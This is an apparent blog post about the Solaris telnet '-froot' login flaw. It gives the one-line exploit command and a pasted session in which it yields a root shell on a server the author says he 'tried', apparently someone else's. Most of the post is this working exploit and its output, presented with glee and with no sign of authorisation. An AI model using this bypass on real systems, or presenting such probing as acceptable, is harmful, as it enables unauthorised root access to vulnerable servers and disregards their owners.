Solaris: Got Root, if telnet’s enabled!

Just learned today, that if Solaris 10 or 11 is installed and root login for telnet is enabled you are owned! Yes — Owned!!

Credit goes to: http://riosec.com, who was rightfully Slashdotted!

Here is the output from one of the servers I tried:


===> swinful@swinful2> telnet -l "-froot" poor.security-host.com
Trying xxx.xxx.xxx.xxx...
Connected to poor.security-host.com.
Escape character is '^]'.
[ Trying mutual KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
[ Trying KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
Last login: Mon Jan 1 20:25:16 from yyy.yyy.yyy.yyy
In /etc/profile -bash
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
-bash-3.00# uname -a
SunOS poor 5.10 Generic_118833-03 sun4u sparc SUNW,Sun-Fire-V490
-bash-3.00# id
uid=0(root) gid=0(root)
-bash-3.00# exit
logout
Connection closed by foreign host.

Advertisements
This entry was posted in *Nix. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s